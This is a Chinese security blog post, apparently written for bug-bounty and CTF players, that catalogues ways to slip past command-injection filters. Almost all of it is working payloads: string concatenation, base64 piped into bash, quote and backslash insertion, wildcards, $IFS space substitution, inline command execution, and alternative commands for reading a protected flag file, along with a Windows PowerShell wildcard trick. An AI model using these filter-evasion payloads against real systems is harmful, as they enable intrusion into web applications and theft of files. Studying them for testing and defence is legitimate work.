!
也想出现在这里? 联系我们
创意广告

【SRC技巧】优雅地进行命令执行绕过

拼接绕过

a=ca; b=t;c=flag; $a$b $c.php

cat flag.php

编码绕过

echo "Y2F0IGZsYWcucGhw" | base64 -d|bash

`echo "Y2F0IGZsYWcucGhw"| base64 -d`

cat flag.php

单双引号

ca""t fl''ag.php

cat flag.php

反斜杠

ca\t fl\ag.php

cat flag.php

可变扩展绕过

c\at flag.???

cat flag.php

shell特殊变量

ca$@t fl$@ag.php

cat flag.php

Windows(通配符绕过)

powershell c:\*\system32\c??c.exe@^p^o^w^e^rshell c:\*\system32\c??c.exe 弹计算器

*表示一串字符串,?表示一个字符

换行执行命令

ca\

t
fl
ag

长度限制绕过

cat flag.php > a

sh a

空格绕过

linux

cat$IFSflag.php

或cat$IFS$flag.php

或cat${IFS}flag.php

或cat${IFS}$flag.php

cat<>flag.php

或cat<flag.php

cat%09falg.php(需要php环境)

windows

ping%CommonProgramFiles:~10,-18%IP

ping%PROGRAMFILES:~10,-5%IP
图片[1]-【SRC技巧】优雅地进行命令执行绕过-安全小天地

内敛执行绕过

echo "xxx `cat flag.php"

或

echo "xxx$(cat flag.php)"

过滤了指定的命令

more:一页一页的显示档案内容

less:与 more 类似

head:查看头几行

tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示

tail:查看尾几行

nl:显示的时候,顺便输出行号

od:以二进制的方式读取档案内容

vi:一种编辑器,这个也可以查看

vim:一种编辑器,这个也可以查看

sort:可以查看

uniq:可以查看

file -f:报错出具体内容

sh /flag 2>%261 //报错出文件内容

curl file:///root/f/flag

strings flag

uniq -c flag

bash -v flag

rev flag

所有姿势都可连用并不是只能用那一种姿势,可多种姿势结合使用

原文地址:https://www.yuque.com/besilent/null/vr0ws7zma4cx3gr2


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞5961 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容